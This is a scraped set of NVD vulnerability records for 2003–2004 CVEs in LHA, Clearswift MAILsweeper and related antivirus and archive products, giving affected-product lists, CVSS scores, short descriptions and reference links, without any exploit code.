f-secure f-secure_internet_security 2003
f-secure f-secure_internet_security 2004
f-secure f-secure_personal_express 4.5
f-secure f-secure_personal_express 4.6
f-secure f-secure_personal_express 4.7
f-secure internet_gatekeeper 6.31
f-secure internet_gatekeeper 6.32
rarlab winrar 3.20
redhat lha 1.14i-9
sgi propack 2.4
sgi propack 3.0
stalker cgpmcafee 3.2
tsugio_okamoto lha 1.14
tsugio_okamoto lha 1.15
tsugio_okamoto lha 1.17
winzip winzip 9.0
redhat fedora_core core_1.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFE4FA19-F2EA-4292-A441-2E4A39366942",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA5D7FD1-D5AB-4987-801A-FA464C31298A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "772710C7-41FE-47E2-B0D7-A3C8D36C8808",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "7358AD98-44C1-4CC4-BD50-CFF3822F3A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "AAA1C283-E518-4BC6-BBF0-FCE09F9E0F17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B8A74FB-07B0-42D6-ABF3-D7A073A329E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "49668AFD-4821-4D5A-BEBD-DF55A8AB58C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "57E0BFFD-D777-43A5-AEE8-765F55C86E93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAF9A151-6EBF-4760-A154-A34FF7C9E632",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_gateways:*:*:*:*:*",
              "matchCriteriaId": "6CC9AA17-3EF4-4BC5-9E29-5A6525B9AC51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_servers:*:*:*:*:*",
              "matchCriteriaId": "A9C60C23-FC4D-4D14-B3E3-ECD797888AB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_workstations:*:*:*:*:*",
              "matchCriteriaId": "D04E2381-68CB-455F-8878-17C8E4112C95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_gateways:*:*:*:*:*",
              "matchCriteriaId": "4AE00A20-8152-48D9-9AC4-EA359284E635",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_servers:*:*:*:*:*",
              "matchCriteriaId": "6B334073-9FF3-4F75-8702-51DB6937B7F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_workstations:*:*:*:*:*",
              "matchCriteriaId": "2D553EF0-6A08-4DD0-A301-99AADAFBFFBB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.60:*:samba_servers:*:*:*:*:*",
              "matchCriteriaId": "C8C41338-0651-425E-A823-C8CBD91977D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.5:*:client_security:*:*:*:*:*",
              "matchCriteriaId": "46F72328-7B69-4A1B-A065-E65544F27A75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:mimesweeper:*:*:*:*:*",
              "matchCriteriaId": "2BA28970-0DB9-433E-83A1-36BF05DB062A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:windows_servers:*:*:*:*:*",
              "matchCriteriaId": "C0D25A1D-2B31-4B29-96FE-A793F8244F66",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:workstations:*:*:*:*:*",
              "matchCriteriaId": "AC90ADFD-32FE-4EA1-9583-5EFE585152CB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:mimesweeper:*:*:*:*:*",
              "matchCriteriaId": "B490FC59-616A-4F90-95D8-50F9C0D6CB40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:windows_servers:*:*:*:*:*",
              "matchCriteriaId": "858468E0-4208-4703-A3AA-4BF6CC254DDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:workstations:*:*:*:*:*",
              "matchCriteriaId": "4E26052D-35B8-44E7-8F66-442BA55F4483",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.52:*:client_security:*:*:*:*:*",
              "matchCriteriaId": "CBA4A9B7-626A-4539-852F-96C49D860E41",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:6.21:*:ms_exchange:*:*:*:*:*",
              "matchCriteriaId": "19828867-7079-4233-A3B8-BF7A3052FB8B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:2003:*:*:*:*:*:*:*",
              "matchCriteriaId": "831F0C4D-C85F-46DA-BC9E-D3F56DE2B085",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:2004:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F996B07-8B07-42A6-86FC-B5B55F708861",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_for_firewalls:6.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "119D5A71-E7C2-4603-9D78-A161D82BC2D1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_internet_security:2003:*:*:*:*:*:*:*",
              "matchCriteriaId": "6689D4E1-F8DC-46D9-BA35-4E4AE9C28456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_internet_security:2004:*:*:*:*:*:*:*",
              "matchCriteriaId": "0429B86A-F228-44E8-ABBB-D57BEE3679F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_personal_express:4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "72DE7015-C1FF-4803-8B28-5AF5ECC3AAB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_personal_express:4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "D04F7296-3290-40D1-9CFB-E52FADAE5719",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_personal_express:4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B9A0DDB6-4B86-430E-879A-C835DBB96C42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rarlab:winrar:3.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "C1011521-AEF2-40EB-B671-66B20FF01CC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:redhat:lha:1.14i-9:*:i386:*:*:*:*:*",
              "matchCriteriaId": "EB59539A-8973-45C8-A553-1B524DA43937",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sgi:propack:2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "0702A32E-E577-403C-B4D9-15037D7100A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "29DC217F-C257-4A3C-9CBD-08010C30BEC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:stalker:cgpmcafee:3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FC4CB399-2E2F-4A73-BA41-3EFB0DBDC404",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:tsugio_okamoto:lha:1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "081C75A4-FDB1-4941-8276-985570632A82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:tsugio_okamoto:lha:1.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "A623BD1B-DB9A-4545-9970-E3492AA39A33",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:tsugio_okamoto:lha:1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "8984B914-9850-405C-AAE6-A7C266F13BA3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:winzip:winzip:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "523ADB29-C3D5-4C06-89B6-22B5FC68C240",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:redhat:fedora_core:core_1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C84296C-2C8A-4DCD-9751-52951F8BEA9F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\")."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de atravesamiento de directorios en LHA 1.14 permite a atacantes locales o usuarios locales crear ficheros arbitrarios mediante un archivo LHA conteniendo nombres de fichero con secuencias (1) \"..\" (punto punto) o (2) rutas absolutas con barra inicial doble (\"//ruta/absoluta\")."
    }
  ],
  "id": "CVE-2004-0235",
  "lastModified": "2024-11-20T23:48:04.040",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 6.4,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-08-18T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2004/dsa-515"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/10243"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2004/dsa-515"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/10243"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2003-12-31 05:00
Modified
2024-11-20 23:46
Severity ?
Summary
MAILsweeper for SMTP 4.3 allows remote attackers to bypass virus protection via a mail message with a malformed zip attachment, as exploited by certain MIMAIL virus variants.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFE4FA19-F2EA-4292-A441-2E4A39366942",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA5D7FD1-D5AB-4987-801A-FA464C31298A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "772710C7-41FE-47E2-B0D7-A3C8D36C8808",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "7358AD98-44C1-4CC4-BD50-CFF3822F3A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "AAA1C283-E518-4BC6-BBF0-FCE09F9E0F17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B8A74FB-07B0-42D6-ABF3-D7A073A329E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "49668AFD-4821-4D5A-BEBD-DF55A8AB58C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "57E0BFFD-D777-43A5-AEE8-765F55C86E93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAF9A151-6EBF-4760-A154-A34FF7C9E632",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "MAILsweeper for SMTP 4.3 allows remote attackers to bypass virus protection via a mail message with a malformed zip attachment, as exploited by certain MIMAIL virus variants."
    }
  ],
  "id": "CVE-2003-1154",
  "lastModified": "2024-11-20T23:46:29.257",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2003-12-31T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://secunia.com/advisories/10148"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.computerworld.co.nz/cw.nsf/0/BF9E8E6E2D313E5FCC256DD70016473F?OpenDocument\u0026More="
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/2772"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/8982"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/13611"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://secunia.com/advisories/10148"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.computerworld.co.nz/cw.nsf/0/BF9E8E6E2D313E5FCC256DD70016473F?OpenDocument\u0026More="
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/2772"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/8982"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/13611"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-09-28 04:00
Modified
2024-11-20 23:45
Severity ?
Summary
Clearswift MAILsweeper before 4.3.15 does not properly detect and filter ZIP 6.0 encoded files, which allows remote attackers to bypass intended policy.
Impacted products
Vendor Product Version
clearswift mailsweeper *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "09D10925-2F78-40C9-9B32-08C689D6412D",
              "versionEndIncluding": "4.3.15",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect and filter ZIP 6.0 encoded files, which allows remote attackers to bypass intended policy."
    },
    {
      "lang": "es",
      "value": "Cleanswift MAILsweeper anteriores a 4.3.15 no detectan y filtran de manera adecuada ficheros codificados ZIP 6.0, lo que permite a atacantes remotos saltarse la pol\u00edtica pretendida."
    }
  ],
  "id": "CVE-2003-0929",
  "lastModified": "2024-11-20T23:45:48.420",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-09-28T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.corsaire.com/advisories/c030807-001.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.corsaire.com/advisories/c030807-001.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2003-03-18 05:00
Modified
2024-11-20 23:44
Severity ?
Summary
Clearswift MAILsweeper 4.x allows remote attackers to bypass attachment detection via an attachment that does not specify a MIME-Version header field, which is processed by some mail clients.
Impacted products



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFE4FA19-F2EA-4292-A441-2E4A39366942",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA5D7FD1-D5AB-4987-801A-FA464C31298A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "772710C7-41FE-47E2-B0D7-A3C8D36C8808",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "7358AD98-44C1-4CC4-BD50-CFF3822F3A96",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Clearswift MAILsweeper 4.x allows remote attackers to bypass attachment detection via an attachment that does not specify a MIME-Version header field, which is processed by some mail clients."
    },
    {
      "lang": "es",
      "value": "Clearswift MAIL sweeper 4.x permite a atacantes remotos evitar la detecci\u00f3n de adjuntos mediante un adjunto que no especifica un campo de cabecera MIME-Version, y que es procesado por algunos clientes de correo."
    }
  ],
  "id": "CVE-2003-0121",
  "lastModified": "2024-11-20T23:44:00.480",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2003-03-18T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=104716030503607\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/316311"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/7044"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=104716030503607\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/316311"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/7044"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-08-18 04:00
Modified
2024-11-20 23:48
Severity ?
Summary
Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive.
References
cve@mitre.orghttp://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html
cve@mitre.orghttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840
cve@mitre.orghttp://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html
cve@mitre.orghttp://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html
cve@mitre.orghttp://marc.info/?l=bugtraq&m=108422737918885&w=2
cve@mitre.orghttp://secunia.com/advisories/19514Vendor Advisory
cve@mitre.orghttp://security.gentoo.org/glsa/glsa-200405-02.xml
cve@mitre.orghttp://securitytracker.com/id?1015866
cve@mitre.orghttp://www.debian.org/security/2004/dsa-515
cve@mitre.orghttp://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt
cve@mitre.orghttp://www.osvdb.org/5753
cve@mitre.orghttp://www.osvdb.org/5754
